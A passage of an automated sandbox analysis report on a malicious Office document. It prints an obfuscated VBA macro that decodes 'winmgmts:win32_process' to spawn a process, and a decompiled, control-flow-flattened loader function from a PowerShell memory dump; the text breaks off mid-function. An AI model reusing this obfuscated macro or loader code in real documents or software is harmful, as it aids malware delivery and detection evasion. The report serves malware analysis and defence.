                                                                      Dim BApwTCG as Paragraph

                                                                      249

                                                                      Set ubHTxDED = ilrmFI

                                                                      ilrmFI

                                                                      250

                                                                      For Each BApwTCG in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      251

                                                                      Set dueIMGo = zhliJ

                                                                      zhliJ

                                                                      252

                                                                      If Left(BApwTCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      253

                                                                      ruwfBB = BApwTCG.Range.ListFormat.ListString

                                                                      Range

                                                                      254

                                                                      Elseif InStr(BApwTCG.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      255

                                                                      jVymJ = BApwTCG.Range.Text

                                                                      Range

                                                                      256

                                                                      jVymJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ruwfBB)

                                                                      Replace

                                                                      saw

                                                                      257

                                                                      BApwTCG.Range.Text = jVymJ

                                                                      Range

                                                                      258

                                                                      Set BApwTCG.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      259

                                                                      Endif

                                                                      260

                                                                      Set XSZpp = DvhBN

                                                                      DvhBN

                                                                      261

                                                                      Next BApwTCG

                                                                      Paragraphs

                                                                      261

                                                                      ruwfBB:

                                                                      263

                                                                      Goto BlbPRi

                                                                      264

                                                                      Dim pbPXFg as Paragraph

                                                                      265

                                                                      Set lSOmIHg = wHzvQRHCw

                                                                      wHzvQRHCw

                                                                      266

                                                                      For Each pbPXFg in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      267

                                                                      Set vttGko = OtoVEFFI

                                                                      OtoVEFFI

                                                                      268

                                                                      If Left(pbPXFg.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      269

                                                                      BlbPRi = pbPXFg.Range.ListFormat.ListString

                                                                      Range

                                                                      270

                                                                      Elseif InStr(pbPXFg.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      271

                                                                      SEEmDH = pbPXFg.Range.Text

                                                                      Range

                                                                      272

                                                                      SEEmDH = Replace(saw, "sjgwb", "hqkwjbjdasd" & BlbPRi)

                                                                      Replace

                                                                      saw

                                                                      273

                                                                      pbPXFg.Range.Text = SEEmDH

                                                                      Range

                                                                      274

                                                                      Set pbPXFg.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      275

                                                                      Endif

                                                                      276

                                                                      Set IGyeHIDF = tfnHGB

                                                                      tfnHGB

                                                                      277

                                                                      Next pbPXFg

                                                                      Paragraphs

                                                                      277

                                                                      BlbPRi:

                                                                      279

                                                                      Hbs0geilvqul = Replace(Cxe014lg73v5, "sg yw ah", Zn5_1mdwh2kp2)

                                                                      Replace("wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ahsg yw ahsg yw ahssg yw ahsg yw ahsg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ahsg yw ahpsg yw ahsg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah","sg yw ah",) -> winmgmts:win32_process

                                                                      Zn5_1mdwh2kp2

                                                                      executed
                                                                      280

                                                                      Goto YfXWF

                                                                      281

                                                                      Dim aiupjCA as Paragraph

                                                                      282

                                                                      Set HFzCp = aNLHyKGxD

                                                                      aNLHyKGxD

                                                                      283

                                                                      For Each aiupjCA in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      284

                                                                      Set NrnOEeCi = VrzOGkkDJ

                                                                      VrzOGkkDJ

                                                                      285

                                                                      If Left(aiupjCA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      286

                                                                      YfXWF = aiupjCA.Range.ListFormat.ListString

                                                                      Range

                                                                      287

                                                                      Elseif InStr(aiupjCA.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      288

                                                                      EiZIHkBmm = aiupjCA.Range.Text

                                                                      Range

                                                                      289

                                                                      EiZIHkBmm = Replace(saw, "sjgwb", "hqkwjbjdasd" & YfXWF)

                                                                      Replace

                                                                      saw

                                                                      290

                                                                      aiupjCA.Range.Text = EiZIHkBmm

                                                                      Range

                                                                      291

                                                                      Set aiupjCA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      292

                                                                      Endif

                                                                      293

                                                                      Set LCIxEHv = ykoqBxAG

                                                                      ykoqBxAG

                                                                      294

                                                                      Next aiupjCA

                                                                      Paragraphs

                                                                      294

                                                                      YfXWF:

                                                                      296

                                                                      Goto dwTYCJwLC

                                                                      297

                                                                      Dim aqFpElJ as Paragraph

                                                                      298

                                                                      Set aiaDHfVAA = BjqtUGzGV

                                                                      BjqtUGzGV

                                                                      299

                                                                      For Each aqFpElJ in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      300

                                                                      Set WHeXGpVAC = LEeUqk

                                                                      LEeUqk

                                                                      301

                                                                      If Left(aqFpElJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      302

                                                                      dwTYCJwLC = aqFpElJ.Range.ListFormat.ListString

                                                                      Range

                                                                      303

                                                                      Elseif InStr(aqFpElJ.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      304

                                                                      wTHGJGJ = aqFpElJ.Range.Text

                                                                      Range

                                                                      305

                                                                      wTHGJGJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & dwTYCJwLC)

                                                                      Replace

                                                                      saw

                                                                      306

                                                                      aqFpElJ.Range.Text = wTHGJGJ

                                                                      Range

                                                                      307

                                                                      Set aqFpElJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      308

                                                                      Endif

                                                                      309

                                                                      Set KnxFzdf = wuVfVIU

                                                                      wuVfVIU

                                                                      310

                                                                      Next aqFpElJ

                                                                      Paragraphs

                                                                      310

                                                                      dwTYCJwLC:

                                                                      312

                                                                      Goto PIEpnIEQ

                                                                      313

                                                                      Dim DagVrchHi as Paragraph

                                                                      314

                                                                      Set QjbRmCII = ifZhJxP

                                                                      ifZhJxP

                                                                      315

                                                                      For Each DagVrchHi in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      316

                                                                      Set QurlJAjI = rQGxCbRtR

                                                                      rQGxCbRtR

                                                                      317

                                                                      If Left(DagVrchHi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      318

                                                                      PIEpnIEQ = DagVrchHi.Range.ListFormat.ListString

                                                                      Range

                                                                      319

                                                                      Elseif InStr(DagVrchHi.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      320

                                                                      xWqeABhHw = DagVrchHi.Range.Text

                                                                      Range

                                                                      321

                                                                      xWqeABhHw = Replace(saw, "sjgwb", "hqkwjbjdasd" & PIEpnIEQ)

                                                                      Replace

                                                                      saw

                                                                      322

                                                                      DagVrchHi.Range.Text = xWqeABhHw

                                                                      Range

                                                                      323

                                                                      Set DagVrchHi.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      324

                                                                      Endif

                                                                      325

                                                                      Set wJKPQpiH = NirTjIE

                                                                      NirTjIE

                                                                      326

                                                                      Next DagVrchHi

                                                                      Paragraphs

                                                                      326

                                                                      PIEpnIEQ:

                                                                      328

                                                                      End Function

                                                                      APIs | Meta Information


                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ykoqBxAG

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: BjqtUGzGV

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: LEeUqk

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: wuVfVIU

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ifZhJxP

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: rQGxCbRtR

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: NirTjIE

                                                                      xvhwEkIi

                                                                      Paragraphs

                                                                      vYqwDI

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      MFcvbrIeP

                                                                      HmUuEIbVG

                                                                      Paragraphs

                                                                      gzBJqD

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      polxC

Strings | Decrypted Strings
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
Line | Instruction | Meta Information
160 | Function Yvxv3g2kutodnaylkq(T3bxybxcdn5d) |
161 | On Error Resume Next | executed
162 | Goto zfIxDdGy |
163 | Dim KekJrc as Paragraph |
164 | Set mWRkEDBn = nWADOALQ | nWADOALQ
165 | For Each KekJrc in Bcur5699z4d.Paragraphs | Paragraphs
166 | Set jhoJOEJc = EqstFcEf | EqstFcEf
167 | If Left(KekJrc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then | Left, Range, Len
168 | zfIxDdGy = KekJrc.Range.ListFormat.ListString | Range
169 | Elseif InStr(KekJrc.Range.Text, "kkiew") > 1 Then | InStr, Range
170 | rvAquNI = KekJrc.Range.Text | Range
171 | rvAquNI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zfIxDdGy) | Replace, saw
172 | KekJrc.Range.Text = rvAquNI | Range
173 | Set KekJrc.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal") | Range, Styles
174 | Endif |
175 | Set QpteDQ = CITOv | CITOv
176 | Next KekJrc | Paragraphs
176 | zfIxDdGy: |
178 | Zonfu7wvfwo = T3bxybxcdn5d |
179 | Goto QrQLEAI |
180 | Dim aJzPBis as Paragraph |
181 | Set EGxLDh = swJREBktH | swJREBktH
182 | For Each aJzPBis in Bcur5699z4d.Paragraphs | Paragraphs
183 | Set uqBHEDw = MllKTIJEc | MllKTIJEc
184 | If Left(aJzPBis.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then | Left, Range, Len
185 | QrQLEAI = aJzPBis.Range.ListFormat.ListString | Range
186 | Elseif InStr(aJzPBis.Range.Text, "kkiew") > 1 Then | InStr, Range
187 | golkzCJBD = aJzPBis.Range.Text | Range
188 | golkzCJBD = Replace(saw, "sjgwb", "hqkwjbjdasd" & QrQLEAI) | Replace, saw
189 | aJzPBis.Range.Text = golkzCJBD | Range
190 | Set aJzPBis.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal") | Range, Styles
191 | Endif |
192 | Set qOgvIXcc = fishDz | fishDz
193 | Next aJzPBis | Paragraphs
193 | QrQLEAI: |
195 | Mgpwbt669dipg22hz = Hbs0geilvqul(Zonfu7wvfwo) |
196 | Goto VGSqAr |
197 | Dim kBCITgNAC as Paragraph |
198 | Set vXdLFECJ = xvhwEkIi | xvhwEkIi
199 | For Each kBCITgNAC in Bcur5699z4d.Paragraphs | Paragraphs
200 | Set SeBOI = vYqwDI | vYqwDI
201 | If Left(kBCITgNAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then | Left, Range, Len
202 | VGSqAr = kBCITgNAC.Range.ListFormat.ListString | Range
203 | Elseif InStr(kBCITgNAC.Range.Text, "kkiew") > 1 Then | InStr, Range
204 | bxSXGCyrq = kBCITgNAC.Range.Text | Range
205 | bxSXGCyrq = Replace(saw, "sjgwb", "hqkwjbjdasd" & VGSqAr) | Replace, saw
206 | kBCITgNAC.Range.Text = bxSXGCyrq | Range
207 | Set kBCITgNAC.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal") | Range, Styles
208 | Endif |
209 | Set LqcVa = MFcvbrIeP | MFcvbrIeP
210 | Next kBCITgNAC | Paragraphs
210 | VGSqAr: |
212 | Yvxv3g2kutodnaylkq = Mgpwbt669dipg22hz |
213 | Goto ODMoFC |
214 | Dim PEaiK as Paragraph |
215 | Set ihnSRH = HmUuEIbVG | HmUuEIbVG
216 | For Each PEaiK in Bcur5699z4d.Paragraphs | Paragraphs
217 | Set sDmVCG = gzBJqD | gzBJqD
218 | If Left(PEaiK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then | Left, Range, Len
219 | ODMoFC = PEaiK.Range.ListFormat.ListString | Range
220 | Elseif InStr(PEaiK.Range.Text, "kkiew") > 1 Then | InStr, Range
221 | NcnmJ = PEaiK.Range.Text | Range
222 | NcnmJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ODMoFC) | Replace, saw
223 | PEaiK.Range.Text = NcnmJ | Range
224 | Set PEaiK.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal") | Range, Styles
225 | Endif |
226 | Set CzpmH = polxC | polxC
227 | Next PEaiK | Paragraphs
227 | ODMoFC: |
229 | End Function |

                                                                      Module: Xxuu21l7kiwbxwj_0

                                                                      Declaration

                                                                      Attribute VB_Name = "Xxuu21l7kiwbxwj_0"


                                                                        Executed Functions

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2114923686.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2114923686.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2114923686.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:5%
                                                                        Dynamic/Decrypted Code Coverage:25.3%
                                                                        Signature Coverage:23.1%
                                                                        Total number of Nodes:91
                                                                        Total number of Limit Nodes:4

                                                                        Graph


                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 92%
                                                                        			E10017D7D() {
                                                                        				char _v520;
                                                                        				char _v1040;
                                                                        				char _v1560;
                                                                        				signed int _v1564;
                                                                        				signed int _v1568;
                                                                        				signed int _v1572;
                                                                        				signed int _v1576;
                                                                        				signed int _v1580;
                                                                        				signed int _v1584;
                                                                        				signed int _v1588;
                                                                        				signed int _v1592;
                                                                        				signed int _v1596;
                                                                        				signed int _v1600;
                                                                        				signed int _v1604;
                                                                        				signed int _v1608;
                                                                        				signed int _v1612;
                                                                        				signed int _v1616;
                                                                        				signed int _v1620;
                                                                        				signed int _v1624;
                                                                        				signed int _v1628;
                                                                        				signed int _v1632;
                                                                        				signed int _v1636;
                                                                        				signed int _v1640;
                                                                        				signed int _v1644;
                                                                        				signed int _v1648;
                                                                        				signed int _v1652;
                                                                        				signed int _v1656;
                                                                        				signed int _v1660;
                                                                        				signed int _v1664;
                                                                        				signed int _v1668;
                                                                        				signed int _v1672;
                                                                        				signed int _v1676;
                                                                        				signed int _v1680;
                                                                        				signed int _v1684;
                                                                        				signed int _v1688;
                                                                        				signed int _v1692;
                                                                        				signed int _v1696;
                                                                        				signed int _v1700;
                                                                        				signed int _v1704;
                                                                        				signed int _v1708;
                                                                        				signed int _v1712;
                                                                        				signed int _v1716;
                                                                        				signed int _v1720;
                                                                        				signed int _t406;
                                                                        				signed short* _t408;
                                                                        				signed int _t423;
                                                                        				signed int _t425;
                                                                        				signed int _t426;
                                                                        				signed int _t427;
                                                                        				signed int _t428;
                                                                        				signed int _t429;
                                                                        				signed int _t430;
                                                                        				signed int _t431;
                                                                        				signed int _t432;
                                                                        				signed int _t433;
                                                                        				signed int _t441;
                                                                        				signed int* _t470;
                                                                        				signed int* _t471;
                                                                        				signed short* _t477;
                                                                        				signed int* _t478;
                                                                        
                                                                        				_t478 =  &_v1720;
                                                                        				_v1632 = 0x717f;
                                                                        				_v1632 = _v1632 + 0xffff0b69;
                                                                        				_v1632 = _v1632 + 0xffff4bbd;
                                                                        				_v1632 = _v1632 ^ 0xfffec88c;
                                                                        				_v1624 = 0x5b3d;
                                                                        				_t425 = 0x4e;
                                                                        				_v1624 = _v1624 / _t425;
                                                                        				_v1624 = _v1624 + 0x3b40;
                                                                        				_t423 = 0;
                                                                        				_v1624 = _v1624 ^ 0x00006b1e;
                                                                        				_t471 = 0x22ae8e06;
                                                                        				_v1704 = 0xcbd5;
                                                                        				_v1704 = _v1704 >> 6;
                                                                        				_t426 = 0x17;
                                                                        				_v1704 = _v1704 / _t426;
                                                                        				_v1704 = _v1704 + 0x2ad9;
                                                                        				_v1704 = _v1704 ^ 0x00003123;
                                                                        				_v1580 = 0xdbf5;
                                                                        				_t427 = 0x5c;
                                                                        				_v1580 = _v1580 * 0x1b;
                                                                        				_v1580 = _v1580 ^ 0x00173f74;
                                                                        				_v1648 = 0x65d6;
                                                                        				_v1648 = _v1648 + 0x84b1;
                                                                        				_v1648 = _v1648 * 0x12;
                                                                        				_v1648 = _v1648 ^ 0x00101fbb;
                                                                        				_v1696 = 0x93ca;
                                                                        				_v1696 = _v1696 * 0x14;
                                                                        				_v1696 = _v1696 / _t427;
                                                                        				_v1696 = _v1696 + 0xffff60cf;
                                                                        				_v1696 = _v1696 ^ 0xffffe2d0;
                                                                        				_v1568 = 0x4939;
                                                                        				_v1568 = _v1568 + 0xaf0f;
                                                                        				_v1568 = _v1568 ^ 0x0000d95a;
                                                                        				_v1620 = 0x1fb;
                                                                        				_v1620 = _v1620 | 0x860de658;
                                                                        				_v1620 = _v1620 + 0xffff792b;
                                                                        				_v1620 = _v1620 ^ 0x860d467d;
                                                                        				_v1628 = 0x991f;
                                                                        				_v1628 = _v1628 << 0xb;
                                                                        				_v1628 = _v1628 + 0x8561;
                                                                        				_v1628 = _v1628 ^ 0x04c95d8c;
                                                                        				_v1688 = 0xc5a8;
                                                                        				_t428 = 0xf;
                                                                        				_v1688 = _v1688 * 0x46;
                                                                        				_v1688 = _v1688 / _t428;
                                                                        				_t429 = 0x21;
                                                                        				_v1688 = _v1688 * 0x33;
                                                                        				_v1688 = _v1688 ^ 0x00b7e901;
                                                                        				_v1636 = 0x9981;
                                                                        				_v1636 = _v1636 / _t429;
                                                                        				_v1636 = _v1636 >> 8;
                                                                        				_v1636 = _v1636 ^ 0x00005b8d;
                                                                        				_v1672 = 0x4c1b;
                                                                        				_v1672 = _v1672 << 3;
                                                                        				_v1672 = _v1672 | 0xb8c6078b;
                                                                        				_v1672 = _v1672 + 0xfffffa1e;
                                                                        				_v1672 = _v1672 ^ 0xb8c64f7e;
                                                                        				_v1680 = 0x7507;
                                                                        				_v1680 = _v1680 ^ 0xfc87d912;
                                                                        				_t430 = 0x57;
                                                                        				_v1680 = _v1680 / _t430;
                                                                        				_v1680 = _v1680 | 0x52ab30fe;
                                                                        				_v1680 = _v1680 ^ 0x52ef22cb;
                                                                        				_v1572 = 0xd7cd;
                                                                        				_v1572 = _v1572 >> 1;
                                                                        				_v1572 = _v1572 ^ 0x00004425;
                                                                        				_v1612 = 0x327c;
                                                                        				_t431 = 0x4a;
                                                                        				_v1612 = _v1612 / _t431;
                                                                        				_v1612 = _v1612 << 9;
                                                                        				_v1612 = _v1612 ^ 0x000105f8;
                                                                        				_v1684 = 0xeedb;
                                                                        				_v1684 = _v1684 | 0xb4487ed8;
                                                                        				_v1684 = _v1684 + 0xffffe615;
                                                                        				_v1684 = _v1684 * 0x61;
                                                                        				_v1684 = _v1684 ^ 0x4f9e85a0;
                                                                        				_v1708 = 0xa411;
                                                                        				_v1708 = _v1708 >> 0xb;
                                                                        				_v1708 = _v1708 >> 0xc;
                                                                        				_v1708 = _v1708 << 9;
                                                                        				_v1708 = _v1708 ^ 0x00001027;
                                                                        				_v1652 = 0x5fa;
                                                                        				_v1652 = _v1652 * 0x15;
                                                                        				_v1652 = _v1652 | 0x0889c09d;
                                                                        				_v1652 = _v1652 ^ 0x0889d75f;
                                                                        				_v1676 = 0xabed;
                                                                        				_v1676 = _v1676 << 2;
                                                                        				_v1676 = _v1676 + 0xffffe0e5;
                                                                        				_v1676 = _v1676 ^ 0x9631fc90;
                                                                        				_v1676 = _v1676 ^ 0x963327ba;
                                                                        				_v1716 = 0x2f0;
                                                                        				_v1716 = _v1716 >> 0xe;
                                                                        				_v1716 = _v1716 >> 0xf;
                                                                        				_v1716 = _v1716 >> 2;
                                                                        				_v1716 = _v1716 ^ 0x00005632;
                                                                        				_v1668 = 0xb719;
                                                                        				_v1668 = _v1668 >> 0xf;
                                                                        				_v1668 = _v1668 | 0x7bbc307b;
                                                                        				_v1668 = _v1668 ^ 0x1874fdff;
                                                                        				_v1668 = _v1668 ^ 0x63c8a7db;
                                                                        				_v1700 = 0xf68;
                                                                        				_v1700 = _v1700 * 0x3d;
                                                                        				_v1700 = _v1700 * 0x5e;
                                                                        				_v1700 = _v1700 ^ 0xc3b802d4;
                                                                        				_v1700 = _v1700 ^ 0xc2e14722;
                                                                        				_v1604 = 0xf526;
                                                                        				_v1604 = _v1604 | 0xfb865dd6;
                                                                        				_v1604 = _v1604 << 0x10;
                                                                        				_v1604 = _v1604 ^ 0xfdf60e11;
                                                                        				_v1692 = 0xe7a5;
                                                                        				_v1692 = _v1692 >> 9;
                                                                        				_v1692 = _v1692 * 0x69;
                                                                        				_v1692 = _v1692 + 0xffffa091;
                                                                        				_v1692 = _v1692 ^ 0xffffa346;
                                                                        				_v1644 = 0xfb3a;
                                                                        				_v1644 = _v1644 << 0xf;
                                                                        				_v1644 = _v1644 | 0x145f0355;
                                                                        				_v1644 = _v1644 ^ 0x7ddf4d76;
                                                                        				_v1640 = 0x8cc2;
                                                                        				_v1640 = _v1640 | 0xffda9e59;
                                                                        				_v1640 = _v1640 ^ 0xffdaa737;
                                                                        				_v1608 = 0x435c;
                                                                        				_v1608 = _v1608 ^ 0x551376dd;
                                                                        				_v1608 = _v1608 << 7;
                                                                        				_v1608 = _v1608 ^ 0x899af7ad;
                                                                        				_v1588 = 0xd652;
                                                                        				_t432 = 0x1c;
                                                                        				_v1588 = _v1588 / _t432;
                                                                        				_v1588 = _v1588 ^ 0x000058ee;
                                                                        				_v1720 = 0xa7dc;
                                                                        				_v1720 = _v1720 ^ 0x05a38014;
                                                                        				_t433 = 0x5b;
                                                                        				_v1720 = _v1720 / _t433;
                                                                        				_v1720 = _v1720 + 0xfffffd60;
                                                                        				_v1720 = _v1720 ^ 0x000fa20d;
                                                                        				_v1576 = 0xb9c2;
                                                                        				_v1576 = _v1576 * 0x73;
                                                                        				_v1576 = _v1576 ^ 0x0053500f;
                                                                        				_v1596 = 0x70f2;
                                                                        				_v1596 = _v1596 ^ 0x2104d0ae;
                                                                        				_v1596 = _v1596 ^ 0x2104d823;
                                                                        				_v1616 = 0x5963;
                                                                        				_v1616 = _v1616 << 9;
                                                                        				_v1616 = _v1616 ^ 0x4dab58e4;
                                                                        				_v1616 = _v1616 ^ 0x4d19c9be;
                                                                        				_v1564 = 0xedf5;
                                                                        				_v1564 = _v1564 + 0xa5f4;
                                                                        				_v1564 = _v1564 ^ 0x0001b6b3;
                                                                        				_v1660 = 0x832e;
                                                                        				_v1660 = _v1660 + 0xffff50b4;
                                                                        				_v1660 = _v1660 >> 5;
                                                                        				_v1660 = _v1660 ^ 0x07ffee80;
                                                                        				_v1712 = 0x8701;
                                                                        				_v1712 = _v1712 ^ 0x095342ef;
                                                                        				_v1712 = _v1712 ^ 0x499570f7;
                                                                        				_v1712 = _v1712 << 6;
                                                                        				_v1712 = _v1712 ^ 0x31ad5d39;
                                                                        				_v1664 = 0x5186;
                                                                        				_v1664 = _v1664 * 0x48;
                                                                        				_v1664 = _v1664 + 0xffff7e0d;
                                                                        				_v1664 = _v1664 + 0xfc6;
                                                                        				_v1664 = _v1664 ^ 0x00162065;
                                                                        				_v1600 = 0x4362;
                                                                        				_v1600 = _v1600 + 0xffff7a4f;
                                                                        				_v1600 = _v1600 ^ 0xffff8bd1;
                                                                        				_t477 = _v1600;
                                                                        				_v1584 = 0x3cb6;
                                                                        				_v1584 = _v1584 << 2;
                                                                        				_v1584 = _v1584 ^ 0x0000d772;
                                                                        				_v1656 = 0x7847;
                                                                        				_v1656 = _v1656 * 0x76;
                                                                        				_v1656 = _v1656 >> 7;
                                                                        				_v1656 = _v1656 ^ 0x00002d73;
                                                                        				_v1592 = 0x219b;
                                                                        				_v1592 = _v1592 + 0x5ed0;
                                                                        				_v1592 = _v1592 ^ 0x0000e1f1;
                                                                        				while(_t471 != 0x5dac24b) {
                                                                        					if(_t471 == 0x94e3c78) {
                                                                        						_t408 = _t477;
                                                                        						__eflags =  *_t477 - _t423;
                                                                        						while(__eflags != 0) {
                                                                        							__eflags =  *_t408 - 0x2c;
                                                                        							if( *_t408 == 0x2c) {
                                                                        								_t470 =  &_v1560;
                                                                        								while(1) {
                                                                        									_t408 =  &(_t408[1]);
                                                                        									_t441 =  *_t408 & 0x0000ffff;
                                                                        									__eflags = _t441;
                                                                        									if(_t441 == 0) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags = _t441 - 0x20;
                                                                        									if(_t441 != 0x20) {
                                                                        										 *_t470 = _t441;
                                                                        										_t470 =  &(_t470[0]);
                                                                        										__eflags = _t470;
                                                                        										continue;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								_t433 = 0;
                                                                        								__eflags = 0;
                                                                        								 *_t470 = 0;
                                                                        							}
                                                                        							_t408 =  &(_t408[1]);
                                                                        							__eflags =  *_t408 - _t423;
                                                                        						}
                                                                        						_t471 = 0x5dac24b;
                                                                        						continue;
                                                                        					} else {
                                                                        						if(_t471 == 0x1d31c645) {
                                                                        							_t477 = E1001B8E7();
                                                                        							_t471 = 0x94e3c78;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t471 == 0x1e27a3c8) {
                                                                        								_push(_v1592);
                                                                        								_push(_t423);
                                                                        								_push(_t477);
                                                                        								_push(_t433);
                                                                        								_push(_v1656);
                                                                        								_push(_v1584);
                                                                        								_push(_t423);
                                                                        								_push(_t423);
